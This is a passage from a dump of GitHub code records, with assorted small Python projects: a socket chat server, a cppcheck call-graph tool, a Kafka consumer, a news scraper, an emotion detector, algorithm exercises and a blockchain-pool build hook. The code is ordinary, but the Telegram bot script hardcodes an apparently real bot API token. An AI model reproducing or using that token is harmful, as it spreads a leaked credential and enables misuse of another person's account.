print('sock', sock)\n # a new connection request recieved\n if sock == s:\n # Login choice\n sockfd, addr = s.accept()\n print ('Tulen!')\n message = sockfd.recv(rsp.BUFFER_SIZE) # We assume username is shorter than buffer\n message = rsp.sanitize_message(message)\n req_code = message[0]\n u_name = message[1]\n\n if u_name in online_clients:\n message = rsp.make_response([rsp._USERNAME_TAKEN])\n sockfd.send(message)\n break\n\n SOCKET_LIST.append(sockfd)\n online_clients[u_name] = sockfd\n print(online_clients)\n print (\"Client (%s, %s) connected\" % addr)\n print(user_dict)\n message = rsp.make_response([rsp._FILE_LIST] + list(user_dict[u_name]))\n sockfd.send(message)\n\n else:\n # message = get_message(sock)\n #Is message coming from that socket\n message = sock.recv(rsp.BUFFER_SIZE)\n final_message = message\n if message:\n #is message ended\n while len(message) == rsp.BUFFER_SIZE and not message.endswith(rsp.SPACE_INVADER):\n message = sock.recv(rsp.BUFFER_SIZE)\n final_message += message\n \n message = final_message\n print('SERVER RECEIVENG MSG:', message)\n message = rsp.sanitize_message(message)\n req_code = message[0]\n message = message[1:]\n\n\n if req_code == rsp._CREATE_FILE:\n u_name = [user for user, socket in online_clients.items() if socket == sock]\n response = create_file(u_name[0])\n elif req_code == rsp._OPEN_FILE:\n response = open_file(message[0], sock)\n elif req_code == rsp._UPDATE_FILE:\n file_dict[message[0]] = message[1]\n broadcast_text(s, sock, message[0])\n response = rsp.make_response([rsp._RESP_OK])\n elif req_code == rsp._GET_PERM:\n response = get_perm(message[0])\n elif req_code == rsp._SET_PERM:\n edit_permission(message)\n broadcast_file_list(s, sock)\n client = [client for client, socket in online_clients.items() if socket == sock][0]\n print('NEW LIST FOR CLIENT:', client, user_dict[client])\n response = rsp.make_response([rsp._FILE_LIST] + list(user_dict[client]))\n\n #TODO brodcast new file list\n else:\n continue\n print(file_dict)\n\n sock.send(response)\n else:\n remove_user_presence(sock)\n print('User disconnected. Presence removed.')\n time.sleep(0.01)\n\n except Exception as e:\n\n print ('Terminating ...')\n print(e)\n traceback.print_exc()\n s.close()\n\n","repo_name":"AnnabellKuldmaa/ds16","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35113273411","text":"import os\nimport re\nimport sys\nfrom collections import defaultdict\nfrom os import walk\nfrom pprint import pprint\nfrom subprocess import call, Popen, PIPE\n\nfrom typing import List, Dict, Optional\n\nfrom cppcheckdata import parsedump, Token\n\nCPP_CHECK = '/home/znarf/Téléchargements/cppcheck-1.82/cppcheck'\n\n\ndef main():\n print(sys.argv)\n\n function_calls = defaultdict(set)\n files_deps = defaultdict(set)\n func_decl_file = {} # type: Dict[str, str]\n\n for dirpath, _, files in walk('.'):\n for basename in files:\n file = os.path.join(dirpath, basename)\n\n if file[-2:] == '.c':\n print(file)\n call([CPP_CHECK, '--dump', file] + sys.argv[1:])\n\n dump_file = file + '.dump'\n d = parsedump(dump_file)\n os.remove(dump_file)\n\n try:\n # functions = d.configurations[0].functions\n scopes = d.configurations[0].scopes\n tokens = d.configurations[0].tokenlist # type: List[Token]\n\n for scope in scopes:\n scope.tokens = [t for t in tokens if t.scopeId == scope.Id]\n\n for scope in scopes:\n if scope.type == 'Function':\n func_decl_file[scope.function.name] = file\n for t in scope.tokens:\n if t.function is not None:\n function_calls[scope.function.name].add(t.function.name)\n\n except Exception as e:\n print(e)\n\n # Dépendences entre fichiers .c\n for caller, callees in function_calls.items():\n for callee in callees:\n if caller in func_decl_file and callee in func_decl_file:\n files_deps[func_decl_file[caller]].add(func_decl_file[callee])\n\n pprint(function_calls, indent=2)\n pprint(func_decl_file, indent=2)\n pprint(files_deps, indent=2)\n\n dot_graph('calls', function_calls)\n dot_graph('files', files_deps)\n dot_graph('full', function_calls, reverse_dict(func_decl_file))\n\n\ndef reverse_dict(d):\n out = defaultdict(set)\n\n for k, v in d.items():\n out[v].add(k)\n\n return dict(out)\n\n\ndef dot_graph(name: str,\n d: Dict[str, str],\n clusters: Optional[Dict[str, str]] = None) -> None:\n dot = '''digraph d {\n rankdir = UD;\n node [shape = rectangle; style = rounded];\n '''\n\n if clusters is not None:\n r = re.compile('[~\\W]')\n for cluster, nodes in clusters.items():\n dot += 'subgraph cluster_{} {{\\n'.format(r.sub('_', cluster))\n dot += 'label = \"{}\"\\n'.format(cluster)\n for node in sorted(nodes):\n dot += '\"{}\";\\n'.format(node)\n dot += '}\\n\\n'\n\n for caller, callees in d.items():\n dot += '\"{}\" -> {{\"{}\"}};\\n'.format(caller, '\" \"'.join(sorted(callees)))\n\n dot += '}'\n\n print('==================================================')\n print(dot)\n print('==================================================')\n\n outfile = name + '.png'\n p = Popen(['dot', '-Tpng', '-o', outfile], stdin=PIPE, stdout=PIPE)\n p.communicate(bytes(dot, 'utf8'))\n\n call(['xdg-open', outfile])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"znarf94/c_call_graph","sub_path":"cppcheck_graph.py","file_name":"cppcheck_graph.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10872026438","text":"import json\r\nimport requests\r\nfrom kafka import KafkaConsumer\r\n\r\nconsumer = KafkaConsumer('test', bootstrap_servers=['localhost:9092'],\r\n value_deserializer=lambda m: json.loads(m.decode('ascii')))\r\nfor message in consumer:\r\n value = message.value\r\n print(\"Recieved parameters:\")\r\n print(value)\r\n headers = {\r\n 'Content-Type':'application/json; charset=UTF-8',\r\n }\r\n info = requests.post(\"http://127.0.0.1:5000/predict\",data=json.dumps(message.value['body']),headers=headers)\r\n print(\"The prediction is:\")\r\n print(info.text)\r\n\r\n","repo_name":"suddenukit/Iris-Model-Flask-App","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19115364546","text":"# Написать приложение, которое собирает основные новости с сайта на выбор news.mail.ru, lenta.ru, yandex-новости.\n# Для парсинга использовать XPath. Структура данных должна содержать:\n# название источника;\n# наименование новости;\n# ссылку на новость;\n# дата публикации.\n# Сложить собранные новости в БД\n\nfrom pprint import pprint\nfrom lxml import html\nimport requests\nfrom pymongo import MongoClient\n\nclient = MongoClient('127.0.0.1', 27017)\ndb = client['News']\nnews_item = db.mail_news\n\nurl = 'https://news.mail.ru/'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'}\n\nresponse = requests.get(url, headers=headers)\ndom = html.fromstring(response.text)\nitems = dom.xpath('//td[@class=\"daynews__main\"]/div | //div[@class=\"daynews__item\"] | //ul[@data-module]/li')\nfor item in items:\n news = {}\n title = item.xpath('.//span[@class=\"photo__captions\"]//span[1]/text() | .//a/text()')[0].replace('\\xa0', ' ')\n link = item.xpath('.//a/@href')[0]\n response_link = requests.get(link, headers=headers)\n dom_news = html.fromstring(response_link.text)\n source = dom_news.xpath('//span[@class=\"note\"]//span[@class=\"link__text\"]/text()')[0]\n date = dom_news.xpath('//span[@class=\"note\"]/span[@datetime]/@datetime')[0]\n\n news['title'] = title\n news['link'] = link\n news['date'] = date\n news['source'] = source\n\n try:\n news_item.update_one({'link': news['link']}, {'$set': news}, upsert=True)\n except Exception as ex:\n pprint(f'Cannot add this new in db {ex}')\n","repo_name":"Sorulai/ParsingPython","sub_path":"lesson4/mailnews.py","file_name":"mailnews.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17491683240","text":"import cv2\r\nfrom keras.models import model_from_json \r\nfrom keras.preprocessing import image \r\nimport numpy as np \r\n\r\n# Load the cascade\r\n#load model \r\nmodel = model_from_json(open(\"fer.json\", \"r\").read()) \r\n#load weights \r\nmodel.load_weights('fer.h5') \r\n\r\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\n# To capture video from webcam. \r\ncap = cv2.VideoCapture(0)\r\n# To use a video file as input \r\n# cap = cv2.VideoCapture('filename.mp4')\r\n\r\nwhile True:\r\n # Read the frame\r\n _, img = cap.read()\r\n # Convert to grayscale\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n # Detect the faces\r\n faces = face_cascade.detectMultiScale(gray, 1.5, 3)\r\n # Draw the rectangle around each face\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\r\n roi_gray=gray[y:y+w,x:x+h]#cropping region of interest i.e. face area from image \r\n roi_gray=cv2.resize(roi_gray,(48,48)) \r\n img_pixels = image.img_to_array(roi_gray) \r\n img_pixels = np.expand_dims(img_pixels, axis = 0) \r\n img_pixels /= 255 \r\n \r\n predictions = model.predict(img_pixels) \r\n \r\n #find max indexed array \r\n max_index = np.argmax(predictions[0]) \r\n \r\n emotions = ('angry', 'disgust', 'fear', 'happy', 'sad', 'surprise','neutral') \r\n predicted_emotion = emotions[max_index] \r\n \r\n cv2.putText(img, predicted_emotion, (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2) \r\n \r\n resized_img = cv2.resize(img, (1000, 700)) \r\n cv2.imshow('Facial emotion analysis ',resized_img) \r\n # Display\r\n \r\n # Stop if escape key is pressed\r\n k = cv2.waitKey(30) & 0xff\r\n if k==27:\r\n break\r\n# Release the VideoCapture object\r\ncap.release()","repo_name":"Sharon18wh1a0580/EmotionDetection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898300057","text":"# https://leetcode.com/problems/number-of-islands/\n\nimport collections\n\n# first thought, dfs, TC:O(N*M), SC:O(N*M)\ndef numIslands(grid) -> int:\n res = 0\n visit = set()\n\n def dfs(r, c):\n if r < 0 or c < 0 or r >= len(grid) or c >= len(grid[0]):\n return\n if (r, c) in visit:\n return\n if grid[r][c] == \"0\":\n return\n visit.add((r, c))\n for x, y in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n dfs(r + y, c + x)\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\" and (i, j) not in visit:\n res += 1\n dfs(i, j)\n return res\n\n\n# dfs, mark visit as \"0\" to save visit, TC:O(N*M), SC:O(N*M), worst case for all lands\ndef numIslands(grid) -> int:\n res = 0\n def dfs(r, c):\n if r < 0 or c < 0 or r >= len(grid) or c >= len(grid[0]) or grid[r][c] == \"0\":\n return\n grid[r][c] = \"0\"\n for x, y in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n dfs(r + y, c + x)\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n res += 1\n dfs(i, j)\n return res\n\n# bfs, mark visit as \"0\" to save visit, TC:O(N*M), SC:O(N*M), worst case for all lands\ndef numIslands(grid) -> int:\n n = len(grid)\n m = len(grid[0])\n res = 0\n for i in range(n):\n for j in range(m):\n if grid[i][j] == '0':\n continue\n # do bfs for every 1s cell\n res += 1\n queue = collections.deque([(i, j)])\n grid[i][j] = '0' # mark visited\n while queue:\n r, c = queue.popleft()\n for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)): # four directions\n nr = r + dr\n nc = c + dc\n if nr < 0 or nc < 0 or nr >= n or nc >= m or grid[nr][nc] == '0':\n continue\n queue.append((nr, nc))\n grid[nr][nc] = '0' # marked visited\n return res\n","repo_name":"ychanc2104/LeetCode","sub_path":"Number of Islands.py","file_name":"Number of Islands.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74492152487","text":"# Exercício - sistema de perguntas e respostas\n\nperguntas = [\n {\n 'Pergunta': 'Quanto é 2+2?',\n 'Opções': {'a': '1','b': '3','c': '4','d': '5'},\n 'Resposta': '4'\n },\n {\n 'Pergunta': 'Quanto é 5*5?',\n 'Opções': {'a': '25','b': '55','c': '10','d': '51'},\n 'Resposta': '25'\n },\n {\n 'Pergunta': 'Quanto é 10/2?',\n 'Opções': {'a': '4','b': '5','c': '2','d': '1'},\n 'Resposta': '5'\n }\n]\nacertos = 0\nprint('{:-^20}'.format('SHOW DO MILHÃO'))\n\nfor pergunta in perguntas:\n print(f'Pergunta: {pergunta.get(\"Pergunta\")}\\n')\n\n print('Opções')\n for letra, resposta in pergunta.get('Opções').items():\n print(f'{letra}) {resposta: <2}')\n print()\n\n alternativa = input('Digite a alternativa correta: ')\n if pergunta.get('Opções').get(alternativa) == pergunta.get('Resposta'):\n print('Você acertou!')\n acertos += 1\n else:\n print('Você errou!')\n\n print()\n\nprint(f'Você acertou {acertos}\\nde {len(perguntas)} perguntas.')\n","repo_name":"LinekerCalseverini/PythonStudies","sub_path":"Aula77/aula77.py","file_name":"aula77.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71713643367","text":"from telegram.ext import *\nimport responses as r\n\ndef start_command(update, context):\n update.message.reply_text('salam bar shoma')\n\ndef main():\n updater = Updater('5263621778:AAEMxIktCgfExbYGmmltFHgZ-FjspX5PBcY', use_context=True)\n dp = updater.dispatcher\n\n dp.add_handler(CommandHandler(\"start\", start_command))\n updater.start_polling()\n updater.idle()\n\nmain()","repo_name":"imanhavangi/CancerContent","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27308760332","text":"from genericpath import exists\nimport os, sys\nfrom os.path import join\nimport tempfile\nimport shutil\nimport json\ntry:\n curr_path = os.path.dirname(os.path.abspath(__file__))\n teedoc_project_path = os.path.abspath(os.path.join(curr_path, \"..\", \"..\", \"..\"))\n if os.path.basename(teedoc_project_path) == \"teedoc\":\n sys.path.insert(0, teedoc_project_path)\nexcept Exception:\n pass\nfrom teedoc import Plugin_Base\nfrom teedoc import Fake_Logger\n\n__version__ = \"1.0.4\"\n\nclass Plugin(Plugin_Base):\n name = \"teedoc-plugin-baidu-tongji\"\n desc = \"baidu tongji support for teedoc\"\n defautl_config = {\n }\n\n def on_init(self, config, doc_src_path, site_config, logger = None, multiprocess = True, **kw_args):\n '''\n @config a dict object\n @logger teedoc.logger.Logger object\n '''\n self.logger = Fake_Logger() if not logger else logger\n self.doc_src_path = doc_src_path\n self.site_config = site_config\n self.config = Plugin.defautl_config\n self.config.update(config)\n self.logger.i(\"-- plugin <{}> init\".format(self.name))\n self.logger.i(\"-- plugin <{}> config: {}\".format(self.name, self.config))\n \n # set site_root_url env value\n if not \"code\" in config:\n self.logger.e('can not find config[\"code\"] in plugin {}'.format(self.name))\n return\n baidu_tongji_code = ''''''.format(config[\"code\"])\n self.html_header_items = [baidu_tongji_code]\n\n\n def on_add_html_header_items(self, type_name):\n return self.html_header_items\n\n\n\nif __name__ == \"__main__\":\n config = {\n }\n plug = Plugin(config=config)\n\n","repo_name":"teedoc/teedoc","sub_path":"plugins/teedoc-plugin-baidu-tongji/teedoc_plugin_baidu_tongji/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"53"} +{"seq_id":"6198675984","text":"from enum import Enum\nimport re\n\nfrom . import PubTatorDocument\nfrom . import PubTatorEntity\n\n\nclass PubTatorCorpusReader:\n class LineType(Enum):\n TITLE = 'TITLE'\n ABSTRACT = 'ABSTRACT'\n MENTION = 'MENTION'\n DOC_SEP = 'DOCUMENT SEPARATOR'\n\n def __init__(self, file_path):\n self.file_path = file_path\n self.__document_being_read = None\n self.corpus = []\n\n self.valid_transitions = {\n None: [self.LineType.DOC_SEP, self.LineType.TITLE],\n # Title must be followed by abstract\n self.LineType.TITLE: [self.LineType.ABSTRACT],\n # abstract can be followed by mentions or the next title\n # (if no mentions exist)\n self.LineType.ABSTRACT:\n [self.LineType.MENTION, self.LineType.DOC_SEP],\n # mention must be followed by another mention or document separator\n self.LineType.MENTION:\n [self.LineType.MENTION, self.LineType.DOC_SEP],\n # document separator must be followed by another title\n # or document separator\n self.LineType.DOC_SEP:\n [self.LineType.TITLE, self.LineType.DOC_SEP]\n }\n\n def load_corpus(self):\n with open(self.file_path, 'r') as file:\n lines = file.readlines()\n return self.__parse_lines(lines)\n\n def __parse_lines(self, content_lines):\n prev_line_type = None\n for line_number, line in enumerate(content_lines):\n try:\n curr_line_type = self.__get_line_type(line, line_number)\n self.__validate_line_type_transition(prev_line_type,\n curr_line_type)\n if (curr_line_type == self.LineType.ABSTRACT\n or curr_line_type == self.LineType.TITLE):\n line_info = re.split('[|]', line, maxsplit=2)\n else:\n line_info = re.split('[\\t]', line, maxsplit=5)\n\n if curr_line_type == self.LineType.DOC_SEP:\n self.corpus.append(self.__document_being_read)\n self.__document_being_read = None\n\n elif curr_line_type == self.LineType.TITLE:\n if self.__document_being_read is not None:\n self.corpus.append(self.__document_being_read)\n self.__document_being_read = PubTatorDocument(\n int(line_info[0]))\n self.__document_being_read.title_text = (\n line_info[2].rstrip('\\n'))\n\n elif curr_line_type == self.LineType.ABSTRACT:\n self.__document_being_read.abstract_text = (\n line_info[2].rstrip('\\n'))\n\n elif curr_line_type == self.LineType.MENTION:\n self.__document_being_read.add_entity(\n PubTatorEntity(int(line_info[0]), int(line_info[1]),\n int(line_info[2]), line_info[3],\n line_info[4],\n line_info[5].rstrip('\\n')))\n prev_line_type = curr_line_type\n except Exception as e:\n raise Exception('ERROR occured when parsing line'\n f' #{line_number}. Exception {e}')\n\n if self.__document_being_read is not None:\n self.corpus.append(self.__document_being_read)\n\n return self.corpus\n\n def __validate_line_type_transition(self, prev_line_type, curr_line_type):\n if curr_line_type not in self.valid_transitions[prev_line_type]:\n raise Exception(\"Unexpected transition between line types found \"\n f\"'{prev_line_type}' => '{curr_line_type}'.\"\n f\" '{prev_line_type}' can only be followed by\"\n f\" {self.valid_transitions[prev_line_type]}\")\n\n def __get_line_type(self, line, line_number):\n tokens = re.split('[\\t\\n|]', line)[:-1]\n\n if tokens[0] == '' and len(tokens) == 1:\n return self.LineType.DOC_SEP\n if tokens[1] == 'a':\n return self.LineType.ABSTRACT\n if tokens[1] == 't':\n return self.LineType.TITLE\n if len(tokens) == 6:\n return self.LineType.MENTION\n\n raise Exception(f\"Unexpected content received on line #{line_number}\"\n \", the line/data\"\n f\" may have been corrupted. Content: '{line}'\")\n","repo_name":"ArshSekhon/pubtator_loader","sub_path":"pubtator_loader/pubtator_corpus_reader.py","file_name":"pubtator_corpus_reader.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"39591932382","text":"#!/usr/bin/env python3\n\nimport fileinput\n\nPoint = tuple[int, int]\nPointSet = set[Point]\nFold = tuple[str, int]\n\n\ndef read_input() -> list[str]:\n return [str(line.strip()) for line in fileinput.input(\"input.txt\")]\n\n\ndef parse_input(in_lst: list[str]) -> tuple[PointSet, list[Fold]]:\n points = set()\n folds = []\n\n fold_start = -1\n for (idx, line) in enumerate(in_lst):\n if line == \"\":\n fold_start = idx + 1\n break\n split = line.split(\",\")\n points.add((int(split[0]), int(split[1])))\n\n for line in in_lst[fold_start:]:\n line = line.lstrip(\"fold along \")\n split = line.split(\"=\")\n folds.append((split[0], int(split[1])))\n\n return (points, folds)\n\n\ndef apply_fold(points: PointSet, fold: Fold) -> PointSet:\n (axis, level) = fold\n if axis == \"x\":\n points = set(\n map(\n lambda point: (\n level - (point[0] - level) if point[0] > level else point[0],\n point[1],\n ),\n points,\n )\n )\n else:\n points = set(\n map(\n lambda point: (\n point[0],\n level - (point[1] - level) if point[1] > level else point[1],\n ),\n points,\n )\n )\n return points\n\n\ndef main() -> None:\n in_lst = read_input()\n (points, folds) = parse_input(in_lst)\n\n for fold in folds:\n points = apply_fold(points, fold)\n\n x_max = max(points, key=lambda point: point[0])[0]\n y_max = max(points, key=lambda point: point[1])[1]\n\n # Print the Origami\n # Sadly we don't have the font so we have to interprete the output ourself\n for y in range(y_max + 1):\n for x in range(x_max + 1):\n print(\"█\" if (x, y) in points else \" \", end=\"\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"StephanBischoff-Digle/adventofcode","sub_path":"2021/13/13.2/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9011611676","text":"import binascii\nimport magic\n\nfrom hooker import hook\n\n__name__ = 'mime'\nmagic_obj = magic.Magic(flags=magic.MAGIC_MIME_TYPE)\n\n\n@hook(\"imager.with_open\")\ndef mime_file(satori_image, file_path, file_type, fd):\n fd.seek(0)\n chunk = fd.read(512)\n mime = magic_obj.id_buffer(chunk)\n satori_image.set_attribute(file_path, mime, __name__, force_create=True)\n\n\n\n@hook(\"imager.on_end\")\ndef clean_magic():\n magic_obj.close()\n","repo_name":"satori-ng/satori-extensions","sub_path":"meta/mime.py","file_name":"mime.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32240401827","text":"# USACO 2017 Dec Bronze\n# Prob 3. Milk Measurement\n\n# FULLY AC\n\nfin = open(\"measurement.in\", \"r\")\nfout = open(\"measurement.out\", \"w\")\n\noutputs = {name: 7 for name in (\"Bessie\", \"Elsie\", \"Mildred\")}\n\nN = int(fin.readline())\n\nentries = [line.strip().split() for line in fin.readlines()]\nentries = [(int(line[0]), line[1], int(line[2])) for line in entries]\n\nentries.sort(key = lambda e: e[0])\n\ndisplay_changes = 0\nbests = [outputs.keys()]\nfor day, name, change in entries:\n outputs[name] += change\n new_best = max(outputs.values())\n new_best_cows = sorted([cow[0] for cow in outputs.items() if cow[1] == new_best])\n\n if new_best_cows != bests:\n display_changes += 1\n bests = list(new_best_cows)\n\nfout.write(f\"{display_changes}\\n\")\nfout.close()\n","repo_name":"colding10/cp-notebook","sub_path":"solutions/usaco-contest/Past Contests/Milk Measurement/measurement.py","file_name":"measurement.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14128556510","text":"\"\"\"\n Command Line Utility Using Python\n\"\"\"\n\nimport argparse\nimport sys\n\n\ndef calc(args):\n if args.o == \"add\":\n return args.x + args.y\n if args.o == \"sub\":\n return args.x - args.y\n if args.o == \"mul\":\n return args.x * args.y\n if args.o == \"div\":\n return args.x / args.y\n else:\n return \"Invalid input\"\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--x', type=float, default=1.0, help=\"This CLI is for adding numbers. Enter 1st number\")\n parser.add_argument('--y', type=float, default=9.0, help=\"This CLI is for adding numbers. Enter 2nd number\")\n parser.add_argument('--o', type=str, default=\"add\", help=\"This CLI is for adding numbers. Enter operator\")\n args = parser.parse_args()\n sys.stdout.write(str(calc(args)))\n\n\"\"\"\nRun the abode file through terminal\n\"\"\"","repo_name":"puja809/Python","sub_path":"Command Line Utility.py","file_name":"Command Line Utility.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37519123393","text":"import sys \r\n\r\nres = sys.argv[1:]\r\n\r\nif (len(res) < 2):\r\n print(\"\"\"Usage: python operations.py \r\n Example:\r\n python operations.py 10 3\"\"\")\r\n exit(0)\r\n\r\nelif (len(res) > 2):\r\n print(\"\"\"InputError: too many arguments\r\n Usage: python operations.py \r\n Example:\r\n python operations.py 10 3\"\"\")\r\n exit(0)\r\n\r\nif not res[0].isdigit() or not res[1].isdigit():\r\n print(\"\"\"InputError: only numbers\r\n Usage: python operations.py \r\n Example:\r\n python operations.py 10 3\"\"\")\r\n exit(0)\r\n\r\nx = float(res[0])\r\ny = float(res[1])\r\noperation = x + y\r\nprint(\"Sum: \" + str(int(operation)))\r\noperation = x - y\r\nprint(\"Difference: \" + str(int(operation)))\r\noperation = x * y\r\nprint(\"Product: \" + str(int(operation)))\r\nif y== 0:\r\n operation = \"ERROR (div by zero)\"\r\nelse:\r\n operation = x / y\r\nprint(\"Quotient: \" + str(operation))\r\nif y== 0:\r\n operation = \"ERROR (modulo by zero)\"\r\nelse:\r\n operation = int(x % y)\r\nprint(\"Remainder: \" + str(operation))","repo_name":"Alcheemiist/42-AI-Bootcamp-python","sub_path":"M00/ex04/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5046212674","text":"\"\"\"\nCompile-time hook used to set `StableSwap` constants.\n\nThis file should not be modified directly. Values are set based on the\n`pooldata.json` file within each template subdirectory.\n\"\"\"\n\nimport json\n\n\ndef brownie_load_source(path, source):\n\n if \"pool-templates\" not in path.parts:\n return source\n\n with path.parent.joinpath('pooldata.json').open() as fp:\n pool_data = json.load(fp)\n\n decimals = [i['decimals'] for i in pool_data['coins']]\n precision_multiplier = [10**18 // (10**i) for i in decimals]\n rates = [i*10**18 for i in precision_multiplier]\n\n replacements = {\n '___N_COINS___': len(decimals),\n '___PRECISION_MUL___': precision_multiplier,\n '___RATES___': rates,\n '___USE_LENDING___': [i['wrapped'] for i in pool_data['coins']],\n }\n\n for k, v in replacements.items():\n source = source.replace(k, str(v))\n\n return source\n","repo_name":"0xftrestech/curve-contract","sub_path":"brownie_hooks.py","file_name":"brownie_hooks.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74924159209","text":"# -------------------------------------------------------------------------------------------------------------\n# -------------------------------------------------------------------------------------------------------------\n# Таблица приборов учета\n# -------------------------------------------------------------------------------------------------------------\n# -------------------------------------------------------------------------------------------------------------\n# Импортируем Шаблон взаимодействия\nfrom JSON_Backend_framework.Service.Template_Devices_Functions.Settings.MeterDevice.Template_MeterTable_settings import TemplateMeterTable\n# from JSON_Backend_framework.Service.TemplateDecorator import print_log_use_GET_data\n# from JSON_Backend_framework.FormJSON.UM40.Settings.Meter.JSON_Construct_Settings_MeterTable import SettingsMeterTable\n# -------------------------------------------------------------------------------------------------------------\n\n\nclass MeterTable(TemplateMeterTable):\n \"\"\"\n Таблица приборов учета\n\n \"\"\"\n\n # хедерс - Иногда нужен\n _headers = None\n # куки\n _cookies = None\n\n # # Общие настройки\n # Settings = None\n #\n # # Массив из счетчиков\n # _Meters = [{'addr': '72', 'id': 1, 'ifaceCfg': '9600,8n1', 'ifaceName': 'Iface1', 'index': 1, 'pId': 0, 'passRd': '010101010101', 'passWr': '020202020202', 'rtuFider': 1, 'rtuObjNum': 2, 'rtuObjType': 3, 'type': 3, 'typeName': 'Mercury23x'}]\n\n def __init__(self, cookies=None, headers=None, ip_address=None):\n \"\"\"\n Настройки - Таблица Счетчиков\n\n :param cookies:\n :param headers:\n \"\"\"\n if cookies is not None:\n self._cookies = cookies\n if headers is not None:\n self._headers = headers\n\n if ip_address is not None:\n self._ip_address = ip_address\n # # Обнуляем\n # self._define_JSON()\n #\n # def _define_JSON(self):\n # \"\"\"\n # Здесь Сбрасываем настройки\n # \"\"\"\n # # Сбрасываем настройки\n # self.Settings = SettingsMeterTable()\n #\n # # Пункт Первый - Переделываем ВСЕ параметры\n # def _getting_settings(self):\n #\n # \"\"\"\n #\n # В Классе шаблоне метод получения настроек отвечает за встравку GET запроса\n #\n #\n # \"\"\"\n # # Смотрим - есть ли добавленые счетчики\n # data = self.Settings.get_settings()\n # data = data.get(self._Settings_name)\n #\n # # Обнуляем\n # self._define_JSON()\n #\n # if len(data) == 0 :\n # # Теперь если у нас есть данные - Считываем их\n #\n # data = self._request_setting()\n #\n # return data\n #\n # # Запрос настроек\n #\n # @print_log_use_GET_data\n # def _request_setting(self):\n # \"\"\"\n # Здесь запрашиваем нужные нам настройки\n #\n # \"\"\"\n #\n # data = []\n # try:\n # # делаем запрос - получаем ответ\n # response = self.read_settings()\n # # Теперь вытаскиваем нужное\n # if response.get('code') == int(200):\n # answer_setting = response.get('data')\n # # Теперь заполянем наши переменные\n # if answer_setting is not None:\n # Settings = answer_setting[self._Settings_name]\n # if Settings is not None :\n # data = Settings\n # except Exception as e:\n #\n # print(\"При считывании параметров возникла ошибка - \" + str(e))\n #\n # return data\n #\n\n# -------------------------------------------------------------------------------------------------------------\n# ПРИМЕР JSON\n# -------------------------------------------------------------------------------------------------------------\n# data= {'Meters': [{\n# 'addr': '72',\n# 'id': 6,\n# 'ifaceCfg': '9600,8n1',\n# 'ifaceName': 'Iface1',\n# 'index': 1,\n# 'pId': 0,\n# 'passRd': '010101010101',\n# 'passWr': '020202020202',\n# 'rtuFider': 1,\n# 'rtuObjNum': 2,\n# 'rtuObjType': 3,\n# 'type': 3,\n# 'typeName': 'Mercury23x'\n# }]}\n# -------------------------------------------------------------------------------------------------------------\n","repo_name":"TR1GUN/json_backend_framework","sub_path":"JSON_Backend_framework/Devices_USPD/UM40/Functional/Settings/Meter/MeterTable.py","file_name":"MeterTable.py","file_ext":"py","file_size_in_byte":5056,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73966878888","text":"from django.db import models\nfrom 